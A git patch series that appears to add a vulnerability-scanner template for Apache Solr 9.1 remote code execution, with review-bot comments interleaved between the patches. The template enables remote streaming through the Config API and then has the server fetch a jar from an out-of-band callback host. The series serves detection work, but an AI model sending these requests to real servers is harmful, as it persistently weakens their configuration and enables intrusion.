From 25fa0d9aa5bc933f6826061e8060288710608fa6 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Fri, 14 Apr 2023 23:18:11 +0800
Subject: [PATCH 1/6] Create apache-solr-9.1-rce.yaml

---
 vulnerabilities/apache-solr-9.1-rce.yaml | 45 ++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 vulnerabilities/apache-solr-9.1-rce.yaml

diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-9.1-rce.yaml
new file mode 100644
index 0000000000..50f220fcad
--- /dev/null
+++ b/vulnerabilities/apache-solr-9.1-rce.yaml
@@ -0,0 +1,45 @@
+id: apache-solr-9.1-rce
+
+info:
+  name: Apache Solr 9.1 RCE
+  author: j4vaovo
+  severity: critical
+  description: |
+    Apache Solr 9.1 RCE
+  reference:
+    - https://noahblog.360.cn/apache-solr-rce/
+  tags: solr,apache,rce,oast
+
+requests:
+  - raw:
+      - |
+        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+
+      - |
+        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
+        Connection: close
+
+        --------------------------5897997e44b07bf9
+        Content-Disposition: form-data; name="stream.url"
+
+        jar:http://{{interactsh-url}}/test.jar?!/Test.class
+        --------------------------5897997e44b07bf9--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: Java"
From d7bf6709054cd06fd85614d9e76e26e3aa09128d Mon Sep 17 00:00:00 2001
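Review bot: The first raw request persistently flips `requestDispatcher.requestParsers.enableRemoteStreaming` to `true` through the Config API, a state-changing write that stays on the target after the scan and leaves it open to remote-streaming fetches from anyone, yet the template is not marked as such; it should carry `tags: solr,apache,rce,oast,intrusive` and a description telling operators to revert the property (a `set-property` of `false`) after a positive finding. The matchers only establish that the JVM made an outbound HTTP request for the `jar:` URL (`User-Agent: Java` on the interactsh side), which proves remote streaming is reachable but not that any class was loaded or executed, so the finding is a strong indicator rather than confirmed code execution and the description should say so. Both requests hard-code the `gettingstarted` demo collection's core names, so any real deployment will be reported as not vulnerable; enumerating cores from `/solr/admin/cores?action=STATUS&wt=json` with an extractor and iterating over them would remove that false negative. The `description` text `Apache Solr 9.1 RCE` merely repeats the name and gives no indication of the mechanism or the affected versions.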
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Fri, 14 Apr 2023 23:24:14 +0800
Subject: [PATCH 2/6] fix id

---
 .../{apache-solr-9.1-rce.yaml => apache-solr-91-rce.yaml} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename vulnerabilities/{apache-solr-9.1-rce.yaml => apache-solr-91-rce.yaml} (98%)

diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-91-rce.yaml
similarity index 98%
rename from vulnerabilities/apache-solr-9.1-rce.yaml
rename to vulnerabilities/apache-solr-91-rce.yaml
index 50f220fcad..bf1891c8fd 100644
--- a/vulnerabilities/apache-solr-9.1-rce.yaml
+++ b/vulnerabilities/apache-solr-91-rce.yaml
@@ -1,4 +1,4 @@
-id: apache-solr-9.1-rce
+id: apache-solr-91-rce
 
 info:
   name: Apache Solr 9.1 RCE
From 278e2ec6e2a1b082af33d3a8e8802c6a2928e1df Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 1 Aug 2023 10:57:33 +0530
Subject: [PATCH 3/6] Update and rename vulnerabilities/apache-solr-91-rce.yaml to http/vulnerabilities/apache/apache-solr-rce.yaml

---
 .../vulnerabilities/apache/apache-solr-rce.yaml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
 rename vulnerabilities/apache-solr-91-rce.yaml => http/vulnerabilities/apache/apache-solr-rce.yaml (86%)

diff --git a/vulnerabilities/apache-solr-91-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml
similarity index 86%
rename from vulnerabilities/apache-solr-91-rce.yaml
rename to http/vulnerabilities/apache/apache-solr-rce.yaml
index bf1891c8fd..f8fe789fb9 100644
--- a/vulnerabilities/apache-solr-91-rce.yaml
+++ b/http/vulnerabilities/apache/apache-solr-rce.yaml
@@ -1,16 +1,14 @@
-id: apache-solr-91-rce
+id: apache-solr-rce
 
 info:
-  name: Apache Solr 9.1 RCE
+  name: Apache Solr 9.1 - Remote Code Execution
   author: j4vaovo
   severity: critical
-  description: |
-    Apache Solr 9.1 RCE
   reference:
-    - https://noahblog.360.cn/apache-solr-rce/
+    - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
   tags: solr,apache,rce,oast
 
-requests:
+http:
   - raw:
       - |
         POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
From ce0695f2d491a7a6e946bdf85ecddf028970c9a2 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 1 Aug 2023 11:04:43 +0530
Subject: [PATCH 4/6] Create apache-solr-91-rce.yaml

---
 http/apache-solr-91-rce.yaml | 45 ++++++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 http/apache-solr-91-rce.yaml

diff --git a/http/apache-solr-91-rce.yaml b/http/apache-solr-91-rce.yaml
new file mode 100644
index 0000000000..bf1891c8fd
--- /dev/null
+++ b/http/apache-solr-91-rce.yaml
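Review bot: The hunk deletes the `description` block outright instead of replacing its placeholder text, so the template now ships with no description at all while the rest of the `info` block is being brought up to repository conventions. A description grounded in the two requests would be, as a three-line `description: |` block: the template enables `requestDispatcher.requestParsers.enableRemoteStreaming` through the Config API on a named core and then submits a multipart `stream.url` pointing at an attacker-controlled `jar:` URL, and a hit is confirmed by an outbound HTTP request from the Java runtime; note that the first step is a persistent configuration change on the target. The id is generalized to `apache-solr-rce` while `name` still says 9.1 and the reference is version-specific, which will confuse triage once other Solr RCE templates exist; either keep the version in the id or state in the description which versions the check was validated against. Keeping the live `noahblog.360.cn` URL alongside the web.archive.org snapshot would also help readers.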
@@ -0,0 +1,45 @@
+id: apache-solr-91-rce
+
+info:
+  name: Apache Solr 9.1 RCE
+  author: j4vaovo
+  severity: critical
+  description: |
+    Apache Solr 9.1 RCE
+  reference:
+    - https://noahblog.360.cn/apache-solr-rce/
+  tags: solr,apache,rce,oast
+
+requests:
+  - raw:
+      - |
+        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+
+      - |
+        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
+        Connection: close
+
+        --------------------------5897997e44b07bf9
+        Content-Disposition: form-data; name="stream.url"
+
+        jar:http://{{interactsh-url}}/test.jar?!/Test.class
+        --------------------------5897997e44b07bf9--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: Java"
From e2bc266ce29e577442c9129dd94cce860eef5ad6 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 1 Aug 2023 11:06:46 +0530
Subject: [PATCH 5/6] Delete apache-solr-91-rce.yaml

---
 http/apache-solr-91-rce.yaml | 45 ------------------------------------
 1 file changed, 45 deletions(-)
 delete mode 100644 http/apache-solr-91-rce.yaml

diff --git a/http/apache-solr-91-rce.yaml b/http/apache-solr-91-rce.yaml
deleted file mode 100644
index bf1891c8fd..0000000000
--- a/http/apache-solr-91-rce.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: apache-solr-91-rce
-
-info:
-  name: Apache Solr 9.1 RCE
-  author: j4vaovo
-  severity: critical
-  description: |
-    Apache Solr 9.1 RCE
-  reference:
-    - https://noahblog.360.cn/apache-solr-rce/
-  tags: solr,apache,rce,oast
-
-requests:
-  - raw:
-      - |
-        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
-
-      - |
-        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
-        Host: {{Hostname}}
-        Accept: */*
-        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
-        Connection: close
-
-        --------------------------5897997e44b07bf9
-        Content-Disposition: form-data; name="stream.url"
-
-        jar:http://{{interactsh-url}}/test.jar?!/Test.class
-        --------------------------5897997e44b07bf9--
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
-      - type: word
-        part: interactsh_request
-        words:
-          - "User-Agent: Java"
From 4470bfbb29bebd648f83600c55e509dde80919b1 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 2 Aug 2023 13:45:54 +0530
Subject: [PATCH 6/6] Update apache-solr-rce.yaml

---
 http/vulnerabilities/apache/apache-solr-rce.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/vulnerabilities/apache/apache-solr-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml
index f8fe789fb9..de21fc6b71 100644
--- a/http/vulnerabilities/apache/apache-solr-rce.yaml
+++ b/http/vulnerabilities/apache/apache-solr-rce.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   reference:
     - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
+  metadata:
+    max-request: 2
   tags: solr,apache,rce,oast
 
 http:
@@ -20,9 +22,7 @@ http:
       - |
         POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
         Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
-        Connection: close
 
         --------------------------5897997e44b07bf9
         Content-Disposition: form-data; name="stream.url"
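Review bot: The second request still posts to `gettingstarted_shard2_replica_n1` while the Config API write in the first request (above this hunk) went to `gettingstarted_shard1_replica_n1`, so the probe and the configuration change target different cores; this appears to rely on SolrCloud propagating the config overlay collection-wide, and on a standalone core the property would not be set on the core being probed. Pointing both requests at the same core, `POST /solr/gettingstarted_shard1_replica_n1/debug/dump?param=ContentStreams HTTP/1.1`, removes that dependency, and replacing the hard-coded `gettingstarted` demo names with core names extracted from `/solr/admin/cores?action=STATUS&wt=json` would stop the template from silently missing every non-demo deployment. Dropping `Accept` and `Connection: close` from the raw request is harmless. The raw request block continues past the end of this hunk.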